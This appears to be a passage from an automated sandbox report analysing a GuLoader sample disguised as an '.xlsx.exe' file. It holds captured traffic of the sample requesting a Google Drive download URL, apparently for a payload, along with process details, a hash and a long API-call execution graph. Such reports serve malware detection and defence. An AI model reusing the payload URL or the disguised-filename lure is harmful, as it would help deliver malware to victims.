                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:07:56 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:07:56 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-CGl8gSLfuLIrIWbC6_OtFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.650030142.250.181.14435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:07:58 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:07:59 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC7vwFbp_BZu8CrE68JE2Hu6OguQprRj7PgtTdeP7oIriTuX45D6dTJVK-ex2g9L8-GG
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:07:59 GMT
                                                                          Content-Security-Policy: script-src 'nonce-OmsC__QuN2BMpl_AVgvkQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2024-12-16 17:07:59 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 36 71 70 53 4b 36 36 63 4c 67 58 70 74 37 61 43 6f 66 6f 32 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="46qpSK66cLgXpt7aCofo2w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:12:04:51
                                                                          Start date:16/12/2024
                                                                          Path:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
                                                                          Imagebase:0x400000
                                                                          File size:530'598 bytes
                                                                          MD5 hash:321A9608E5BF03BF63F4574D0DF1A380
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2290371684.0000000007D83000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:12:05:05
                                                                          Start date:16/12/2024
                                                                          Path:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
                                                                          Imagebase:0x400000
                                                                          File size:530'598 bytes
                                                                          MD5 hash:321A9608E5BF03BF63F4574D0DF1A380
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.4016458454.0000000004A43000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:20.1%
                                                                            Dynamic/Decrypted Code Coverage:13.7%
                                                                            Signature Coverage:19%
                                                                            Total number of Nodes:1519
                                                                            Total number of Limit Nodes:41
                                                                            execution_graph 4931 401d41 GetDC GetDeviceCaps 4932 402b1d 18 API calls 4931->4932 4933 401d5f MulDiv ReleaseDC 4932->4933 4934 402b1d 18 API calls 4933->4934 4935 401d7e 4934->4935 4936 405f6a 18 API calls 4935->4936 4937 401db7 CreateFontIndirectW 4936->4937 4938 4024e8 4937->4938 3996 403cc2 3997 403e15 3996->3997 3998 403cda 3996->3998 3999 403e26 GetDlgItem GetDlgItem 3997->3999 4008 403e66 3997->4008 3998->3997 4000 403ce6 3998->4000 4001 40419a 19 API calls 3999->4001 4003 403cf1 SetWindowPos 4000->4003 4004 403d04 4000->4004 4007 403e50 SetClassLongW 4001->4007 4002 403ec0 4014 403e10 4002->4014 4066 4041e6 4002->4066 4003->4004 4005 403d21 4004->4005 4006 403d09 ShowWindow 4004->4006 4010 403d43 4005->4010 4011 403d29 DestroyWindow 4005->4011 4006->4005 4012 40140b 2 API calls 4007->4012 4008->4002 4013 401389 2 API calls 4008->4013 4016 403d48 SetWindowLongW 4010->4016 4017 403d59 4010->4017 4015 404123 4011->4015 4012->4008 4018 403e98 4013->4018 4015->4014 4024 404154 ShowWindow 4015->4024 4016->4014 4021 403e02 4017->4021 4022 403d65 GetDlgItem 4017->4022 4018->4002 4023 403e9c SendMessageW 4018->4023 4019 40140b 2 API calls 4037 403ed2 4019->4037 4020 404125 DestroyWindow EndDialog 4020->4015 4085 404201 4021->4085 4025 403d95 4022->4025 4026 403d78 SendMessageW IsWindowEnabled 4022->4026 4023->4014 4024->4014 4029 403da2 4025->4029 4032 403de9 SendMessageW 4025->4032 4033 403db5 4025->4033 4040 403d9a 4025->4040 4026->4014 4026->4025 4028 405f6a 18 API calls 4028->4037 4029->4032 4029->4040 4031 40419a 19 API calls 4031->4037 4032->4021 4034 403dd2 4033->4034 4035 403dbd 4033->4035 4039 40140b 2 API calls 4034->4039 4079 40140b 4035->4079 4036 403dd0 4036->4021 4037->4014 4037->4019 4037->4020 4037->4028 4037->4031 4057 404065 DestroyWindow 4037->4057 4069 40419a 4037->4069 4041 403dd9 4039->4041 4082 404173 4040->4082 4041->4021 4041->4040 4043 403f4d GetDlgItem 4044 403f62 4043->4044 4045 403f6a ShowWindow KiUserCallbackDispatcher 4043->4045 4044->4045 4072 4041bc KiUserCallbackDispatcher 4045->4072 4047 403f94 EnableWindow 4050 403fa8 4047->4050 4048 403fad GetSystemMenu EnableMenuItem SendMessageW 4049 403fdd SendMessageW 4048->4049 4048->4050 4049->4050 4050->4048 4073 4041cf SendMessageW 4050->4073 4074 405f48 lstrcpynW 4050->4074 4053 40400b lstrlenW 4054 405f6a 18 API calls 4053->4054 4055 404021 SetWindowTextW 4054->4055 4075 401389 4055->4075 4057->4015 4058 40407f CreateDialogParamW 4057->4058 4058->4015 4059 4040b2 4058->4059 4060 40419a 19 API calls 4059->4060 4061 4040bd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4060->4061 4062 401389 2 API calls 4061->4062 4063 404103 4062->4063 4063->4014 4064 40410b ShowWindow 4063->4064 4065 4041e6 SendMessageW 4064->4065 4065->4015 4067 4041fe 4066->4067 4068 4041ef SendMessageW 4066->4068 4067->4037 4068->4067 4070 405f6a 18 API calls 4069->4070 4071 4041a5 SetDlgItemTextW 4070->4071 4071->4043 4072->4047 4073->4050 4074->4053 4077 401390 4075->4077 4076 4013fe 4076->4037 4077->4076 4078 4013cb MulDiv SendMessageW 4077->4078 4078->4077 4080 401389 2 API calls 4079->4080 4081 401420 4080->4081 4081->4040 4083 404180 SendMessageW 4082->4083 4084 40417a 4082->4084 4083->4036 4084->4083 4086 404219 GetWindowLongW 4085->4086 4096 4042a2 4085->4096 4087 40422a 4086->4087 4086->4096 4088 404239 GetSysColor 4087->4088 4089 40423c 4087->4089 4088->4089 4090 404242 SetTextColor 4089->4090 4091 40424c SetBkMode 4089->4091 4090->4091 4092 404264 GetSysColor 4091->4092 4093 40426a 4091->4093 4092->4093 4094 404271 SetBkColor 4093->4094 4095 40427b 4093->4095 4094->4095 4095->4096 4097 404295 CreateBrushIndirect 4095->4097 4098 40428e DeleteObject 4095->4098 4096->4014 4097->4096 4098->4097 4939 401a42 4940 402b1d 18 API calls 4939->4940 4941 401a48 4940->4941 4942 402b1d 18 API calls 4941->4942 4943 4019f0 4942->4943 4944 402746 4945 402741 4944->4945 4945->4944 4946 402756 FindNextFileW 4945->4946 4947 4027a8 4946->4947 4949 402761 4946->4949 4950 405f48 lstrcpynW 4947->4950 4950->4949 4951 401cc6 4952 402b1d 18 API calls 4951->4952 4953 401cd9 SetWindowLongW 4952->4953 4954 4029c7 4953->4954 4242 401dc7 4250 402b1d 4242->4250 4244 401dcd 4245 402b1d 18 API calls 4244->4245 4246 401dd6 4245->4246 4247 401de8 EnableWindow 4246->4247 4248 401ddd ShowWindow 4246->4248 4249 4029c7 4247->4249 4248->4249 4251 405f6a 18 API calls 4250->4251 4252 402b31 4251->4252 4252->4244 4955 401bca 4956 402b1d 18 API calls 4955->4956 4957 401bd1 4956->4957 4958 402b1d 18 API calls 4957->4958 4959 401bdb 4958->4959 4960 401beb 4959->4960 4961 402b3a 18 API calls 4959->4961 4962 401bfb 4960->4962 4963 402b3a 18 API calls 4960->4963 4961->4960 4964 401c06 4962->4964 4965 401c4a 4962->4965 4963->4962 4967 402b1d 18 API calls 4964->4967 4966 402b3a 18 API calls 4965->4966 4968 401c4f 4966->4968 4969 401c0b 4967->4969 4970 402b3a 18 API calls 4968->4970 4971 402b1d 18 API calls 4969->4971 4972 401c58 FindWindowExW 4970->4972 4973 401c14 4971->4973 4976 401c7a 4972->4976 4974 401c3a SendMessageW 4973->4974 4975 401c1c SendMessageTimeoutW 4973->4975 4974->4976 4975->4976 4275 4014cb 4276 4051f2 25 API calls 4275->4276 4277 4014d2 4276->4277 4977 40194b 4978 402b1d 18 API calls 4977->4978 4979 401952 4978->4979 4980 402b1d 18 API calls 4979->4980 4981 40195c 4980->4981 4982 402b3a 18 API calls 4981->4982 4983 401965 4982->4983 4984 401979 lstrlenW 4983->4984 4989 4019b5 4983->4989 4985 401983 4984->4985 4985->4989 4990 405f48 lstrcpynW 4985->4990 4987 40199e 4988 4019ab lstrlenW 4987->4988 4987->4989 4988->4989 4990->4987 4991 4024cc 4992 402b3a 18 API calls 4991->4992 4993 4024d3 4992->4993 4996 405bb4 GetFileAttributesW CreateFileW 4993->4996 4995 4024df 4996->4995 4997 40164d 4998 402b3a 18 API calls 4997->4998 4999 401653 4998->4999 5000 40628b 2 API calls 4999->5000 5001 401659 5000->5001 5002 4019cf 5003 402b3a 18 API calls 5002->5003 5004 4019d6 5003->5004 5005 402b3a 18 API calls 5004->5005 5006 4019df 5005->5006 5007 4019e6 lstrcmpiW 5006->5007 5008 4019f8 lstrcmpW 5006->5008 5009 4019ec 5007->5009 5008->5009 5010 401e51 5011 402b3a 18 API calls 5010->5011 5012 401e57 5011->5012 5013 4051f2 25 API calls 5012->5013 5014 401e61 5013->5014 5015 4056c3 2 API calls 5014->5015 5016 401e67 5015->5016 5017 401ec6 CloseHandle 5016->5017 5018 401e77 WaitForSingleObject 5016->5018 5020 402793 5016->5020 5017->5020 5019 401e89 5018->5019 5021 401e9b GetExitCodeProcess 5019->5021 5022 4062eb 2 API calls 5019->5022 5023 401eb8 5021->5023 5024 401ead 5021->5024 5025 401e90 WaitForSingleObject 5022->5025 5023->5017 5027 405e8f wsprintfW 5024->5027 5025->5019 5027->5023 4334 401752 4335 402b3a 18 API calls 4334->4335 4336 401759 4335->4336 4337 401781 4336->4337 4338 401779 4336->4338 4390 405f48 lstrcpynW 4337->4390 4389 405f48 lstrcpynW 4338->4389 4341 40178c 4343 405993 3 API calls 4341->4343 4342 40177f 4345 4061dc 5 API calls 4342->4345 4344 401792 lstrcatW 4343->4344 4344->4342 4352 40179e 4345->4352 4346 40628b 2 API calls 4346->4352 4347 4017da 4348 405b8f 2 API calls 4347->4348 4348->4352 4350 4017b0 CompareFileTime 4350->4352 4351 401870 4353 4051f2 25 API calls 4351->4353 4352->4346 4352->4347 4352->4350 4352->4351 4355 405f48 lstrcpynW 4352->4355 4361 405f6a 18 API calls 4352->4361 4372 401847 4352->4372 4373 405bb4 GetFileAttributesW CreateFileW 4352->4373 4391 405724 4352->4391 4356 40187a 4353->4356 4354 4051f2 25 API calls 4360 40185c 4354->4360 4355->4352 4374 403062 4356->4374 4358 4018a1 SetFileTime 4362 4018b3 CloseHandle 4358->4362 4361->4352 4362->4360 4363 4018c4 4362->4363 4364 4018c9 4363->4364 4365 4018dc 4363->4365 4367 405f6a 18 API calls 4364->4367 4366 405f6a 18 API calls 4365->4366 4369 4018e4 4366->4369 4368 4018d1 lstrcatW 4367->4368 4368->4369 4371 405724 MessageBoxIndirectW 4369->4371 4371->4360 4372->4354 4372->4360 4373->4352 4375 403072 SetFilePointer 4374->4375 4376 40308e 4374->4376 4375->4376 4395 40317d GetTickCount 4376->4395 4379 405c37 ReadFile 4380 4030ae 4379->4380 4381 40317d 43 API calls 4380->4381 4388 40188d 4380->4388 4382 4030c5 4381->4382 4383 40313f ReadFile 4382->4383 4385 4030d5 4382->4385 4382->4388 4383->4388 4386 405c37 ReadFile 4385->4386 4387 403108 WriteFile 4385->4387 4385->4388 4386->4385 4387->4385 4387->4388 4388->4358 4388->4362 4389->4342 4390->4341 4392 405739 4391->4392 4393 405785 4392->4393 4394 40574d MessageBoxIndirectW 4392->4394 4393->4352 4394->4393 4396 4032e7 4395->4396 4397 4031ac 4395->4397 4398 402d1a 33 API calls 4396->4398 4408 40330f SetFilePointer 4397->4408 4404 403095 4398->4404 4400 4031b7 SetFilePointer 4406 4031dc 4400->4406 4404->4379 4404->4388 4405 403271 WriteFile 4405->4404 4405->4406 4406->4404 4406->4405 4407 4032c8 SetFilePointer 4406->4407 4409 4032f9 4406->4409 4412 4063ee 4406->4412 4419 402d1a 4406->4419 4407->4396 4408->4400 4410 405c37 ReadFile 4409->4410 4411 40330c 4410->4411 4411->4406 4413 406413 4412->4413 4414 40641b 4412->4414 4413->4406 4414->4413 4415 4064a2 GlobalFree 4414->4415 4416 4064ab GlobalAlloc 4414->4416 4417 406522 GlobalAlloc 4414->4417 4418 406519 GlobalFree 4414->4418 4415->4416 4416->4413 4416->4414 4417->4413 4417->4414 4418->4417 4420 402d43 4419->4420 4421 402d2b 4419->4421 4422 402d53 GetTickCount 4420->4422 4423 402d4b 4420->4423 4424 402d34 DestroyWindow 4421->4424 4425 402d3b 4421->4425 4422->4425 4427 402d61 4422->4427 4434 4062eb 4423->4434 4424->4425 4425->4406 4428 402d96 CreateDialogParamW ShowWindow 4427->4428 4429 402d69 4427->4429 4428->4425 4429->4425 4438 402cfe 4429->4438 4431 402d77 wsprintfW 4432 4051f2 25 API calls 4431->4432 4433 402d94 4432->4433 4433->4425 4435 406308 PeekMessageW 4434->4435 4436 406318 4435->4436 4437 4062fe DispatchMessageW 4435->4437 4436->4425 4437->4435 4439 402d0d 4438->4439 4440 402d0f MulDiv 4438->4440 4439->4440 4440->4431 4441 402253 4442 402261 4441->4442 4443 40225b 4441->4443 4445 402b3a 18 API calls 4442->4445 4447 40226f 4442->4447 4444 402b3a 18 API calls 4443->4444 4444->4442 4445->4447 4446 402b3a 18 API calls 4449 402286 WritePrivateProfileStringW 4446->4449 4448 402b3a 18 API calls 4447->4448 4450 40227d 4447->4450 4448->4450 4450->4446 5042 402454 5043 402c44 19 API calls 5042->5043 5044 40245e 5043->5044 5045 402b1d 18 API calls 5044->5045 5046 402467 5045->5046 5047 402793 5046->5047 5048 40248b RegEnumValueW 5046->5048 5049 40247f RegEnumKeyW 5046->5049 5048->5047 5050 4024a4 RegCloseKey 5048->5050 5049->5050 5050->5047 5052 401ed4 5053 402b3a 18 API calls 5052->5053 5054 401edb 5053->5054 5055 40628b 2 API calls 5054->5055 5056 401ee1 5055->5056 5057 401ef2 5056->5057 5059 405e8f wsprintfW 5056->5059 5059->5057 4464 4022d5 4465 402305 4464->4465 4466 4022da 4464->4466 4468 402b3a 18 API calls 4465->4468 4467 402c44 19 API calls 4466->4467 4469 4022e1 4467->4469 4470 40230c 4468->4470 4471 4022eb 4469->4471 4475 402322 4469->4475 4476 402b7a RegOpenKeyExW 4470->4476 4472 402b3a 18 API calls 4471->4472 4474 4022f2 RegDeleteValueW RegCloseKey 4472->4474 4474->4475 4477 402c0e 4476->4477 4481 402ba5 4476->4481 4477->4475 4478 402bcb RegEnumKeyW 4479 402bdd RegCloseKey 4478->4479 4478->4481 4482 4062b2 3 API calls 4479->4482 4480 402c02 RegCloseKey 4485 402bf1 4480->4485 4481->4478 4481->4479 4481->4480 4483 402b7a 3 API calls 4481->4483 4484 402bed 4482->4484 4483->4481 4484->4485 4486 402c1d RegDeleteKeyW 4484->4486 4485->4477 4486->4485 4494 4014d7 4495 402b1d 18 API calls 4494->4495 4496 4014dd Sleep 4495->4496 4498 4029c7 4496->4498 4710 40335a #17 SetErrorMode OleInitialize 4711 4062b2 3 API calls 4710->4711 4712 40339d SHGetFileInfoW 4711->4712 4785 405f48 lstrcpynW 4712->4785 4714 4033c8 GetCommandLineW 4786 405f48 lstrcpynW 4714->4786 4716 4033da GetModuleHandleW 4717 4033f4 4716->4717 4718 4059c0 CharNextW 4717->4718 4719 403402 CharNextW 4718->4719 4731 403414 4719->4731 4720 403516 4721 40352a GetTempPathW 4720->4721 4787 403326 4721->4787 4723 403542 4725 403546 GetWindowsDirectoryW lstrcatW 4723->4725 4726 40359c DeleteFileW 4723->4726 4724 4059c0 CharNextW 4724->4731 4727 403326 11 API calls 4725->4727 4795 402dbc GetTickCount GetModuleFileNameW 4726->4795 4729 403562 4727->4729 4729->4726 4732 403566 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4729->4732 4730 4035b0 4738 4059c0 CharNextW 4730->4738 4768 403653 4730->4768 4780 403663 4730->4780 4731->4720 4731->4724 4733 403518 4731->4733 4734 403326 11 API calls 4732->4734 4879 405f48 lstrcpynW 4733->4879 4737 403594 4734->4737 4737->4726 4737->4780 4753 4035cf 4738->4753 4741 403772 4744 403815 ExitProcess 4741->4744 4749 4062b2 3 API calls 4741->4749 4742 40367c 4743 405724 MessageBoxIndirectW 4742->4743 4745 40368a ExitProcess 4743->4745 4746 403692 lstrcatW lstrcmpiW 4751 4036ae CreateDirectoryW SetCurrentDirectoryW 4746->4751 4746->4780 4747 40362d 4750 405a9b 18 API calls 4747->4750 4752 403785 4749->4752 4754 403639 4750->4754 4755 4036d1 4751->4755 4756 4036c6 4751->4756 4757 4062b2 3 API calls 4752->4757 4753->4746 4753->4747 4754->4780 4880 405f48 lstrcpynW 4754->4880 4892 405f48 lstrcpynW 4755->4892 4891 405f48 lstrcpynW 4756->4891 4760 40378e 4757->4760 4761 4062b2 3 API calls 4760->4761 4763 403797 4761->4763 4765 4037b5 4763->4765 4771 4037a5 GetCurrentProcess 4763->4771 4764 403648 4881 405f48 lstrcpynW 4764->4881 4769 4062b2 3 API calls 4765->4769 4767 405f6a 18 API calls 4770 403710 DeleteFileW 4767->4770 4825 40391f 4768->4825 4772 4037ec 4769->4772 4773 40371d CopyFileW 4770->4773 4782 4036df 4770->4782 4771->4765 4775 403801 ExitWindowsEx 4772->4775 4776 40380e 4772->4776 4773->4782 4774 403766 4777 405de2 40 API calls 4774->4777 4775->4744 4775->4776 4779 40140b 2 API calls 4776->4779 4777->4780 4778 405de2 40 API calls 4778->4782 4779->4744 4882 40382d 4780->4882 4781 405f6a 18 API calls 4781->4782 4782->4767 4782->4774 4782->4778 4782->4781 4784 403751 CloseHandle 4782->4784 4893 4056c3 CreateProcessW 4782->4893 4784->4782 4785->4714 4786->4716 4788 4061dc 5 API calls 4787->4788 4790 403332 4788->4790 4789 40333c 4789->4723 4790->4789 4791 405993 3 API calls 4790->4791 4792 403344 CreateDirectoryW 4791->4792 4896 405be3 4792->4896 4900 405bb4 GetFileAttributesW CreateFileW 4795->4900 4797 402dff 4824 402e0c 4797->4824 4901 405f48 lstrcpynW 4797->4901 4799 402e22 4800 4059df 2 API calls 4799->4800 4801 402e28 4800->4801 4902 405f48 lstrcpynW 4801->4902 4803 402e33 GetFileSize 4804 402f34 4803->4804 4822 402e4a 4803->4822 4805 402d1a 33 API calls 4804->4805 4807 402f3b 4805->4807 4806 4032f9 ReadFile 4806->4822 4809 402f77 GlobalAlloc 4807->4809 4807->4824 4904 40330f SetFilePointer 4807->4904 4808 402fcf 4811 402d1a 33 API calls 4808->4811 4810 402f8e 4809->4810 4816 405be3 2 API calls 4810->4816 4811->4824 4813 402f58 4814 4032f9 ReadFile 4813->4814 4817 402f63 4814->4817 4815 402d1a 33 API calls 4815->4822 4818 402f9f CreateFileW 4816->4818 4817->4809 4817->4824 4819 402fd9 4818->4819 4818->4824 4903 40330f SetFilePointer 4819->4903 4821 402fe7 4823 403062 46 API calls 4821->4823 4822->4804 4822->4806 4822->4808 4822->4815 4822->4824 4823->4824 4824->4730 4826 4062b2 3 API calls 4825->4826 4827 403933 4826->4827 4828 403939 4827->4828 4829 40394b 4827->4829 4914 405e8f wsprintfW 4828->4914 4830 405e15 3 API calls 4829->4830 4831 40397b 4830->4831 4832 40399a lstrcatW 4831->4832 4834 405e15 3 API calls 4831->4834 4835 403949 4832->4835 4834->4832 4905 403bf5 4835->4905 4838 405a9b 18 API calls 4839 4039cc 4838->4839 4840 403a60 4839->4840 4842 405e15 3 API calls 4839->4842 4841 405a9b 18 API calls 4840->4841 4843 403a66 4841->4843 4844 4039fe 4842->4844 4845 403a76 LoadImageW 4843->4845 4846 405f6a 18 API calls 4843->4846 4844->4840 4852 403a1f lstrlenW 4844->4852 4853 4059c0 CharNextW 4844->4853 4847 403b1c 4845->4847 4848 403a9d RegisterClassW 4845->4848 4846->4845 4851 40140b 2 API calls 4847->4851 4849 403ad3 SystemParametersInfoW CreateWindowExW 4848->4849 4850 403b26 4848->4850 4849->4847 4850->4780 4856 403b22 4851->4856 4854 403a53 4852->4854 4855 403a2d lstrcmpiW 4852->4855 4857 403a1c 4853->4857 4859 405993 3 API calls 4854->4859 4855->4854 4858 403a3d GetFileAttributesW 4855->4858 4856->4850 4861 403bf5 19 API calls 4856->4861 4857->4852 4860 403a49 4858->4860 4862 403a59 4859->4862 4860->4854 4863 4059df 2 API calls 4860->4863 4864 403b33 4861->4864 4915 405f48 lstrcpynW 4862->4915 4863->4854 4866 403bc2 4864->4866 4867 403b3f ShowWindow LoadLibraryW 4864->4867 4868 4052c5 5 API calls 4866->4868 4869 403b65 GetClassInfoW 4867->4869 4870 403b5e LoadLibraryW 4867->4870 4871 403bc8 4868->4871 4872 403b79 GetClassInfoW RegisterClassW 4869->4872 4873 403b8f DialogBoxParamW 4869->4873 4870->4869 4875 403be4 4871->4875 4876 403bcc 4871->4876 4872->4873 4874 40140b 2 API calls 4873->4874 4874->4850 4877 40140b 2 API calls 4875->4877 4876->4850 4878 40140b 2 API calls 4876->4878 4877->4850 4878->4850 4879->4721 4880->4764 4881->4768 4883 403848 4882->4883 4884 40383e CloseHandle 4882->4884 4885 403852 CloseHandle 4883->4885 4886 40385c 4883->4886 4884->4883 4885->4886 4917 40388a 4886->4917 4889 4057d0 71 API calls 4890 40366c OleUninitialize 4889->4890 4890->4741 4890->4742 4891->4755 4892->4782 4894 4056f2 CloseHandle 4893->4894 4895 4056fe 4893->4895 4894->4895 4895->4782 4897 405bf0 GetTickCount GetTempFileNameW 4896->4897 4898 405c26 4897->4898 4899 403358 4897->4899 4898->4897 4898->4899 4899->4723 4900->4797 4901->4799 4902->4803 4903->4821 4904->4813 4906 403c09 4905->4906 4916 405e8f wsprintfW 4906->4916 4908 403c7a 4909 405f6a 18 API calls 4908->4909 4910 403c86 SetWindowTextW 4909->4910 4911 403ca2 4910->4911 4912 4039aa 4910->4912 4911->4912 4913 405f6a 18 API calls 4911->4913 4912->4838 4913->4911 4914->4835 4915->4840 4916->4908 4918 403898 4917->4918 4919 403861 4918->4919 4920 40389d FreeLibrary GlobalFree 4918->4920 4919->4889 4920->4919 4920->4920 5067 40155b 5068 40296d 5067->5068 5071 405e8f wsprintfW 5068->5071 5070 402972 5071->5070 5072 4038dd 5073 4038e8 5072->5073 5074 4038ec 5073->5074 5075 4038ef GlobalAlloc 5073->5075 5075->5074 5076 40165e 5077 402b3a 18 API calls 5076->5077 5078 401665 5077->5078 5079 402b3a 18 API calls 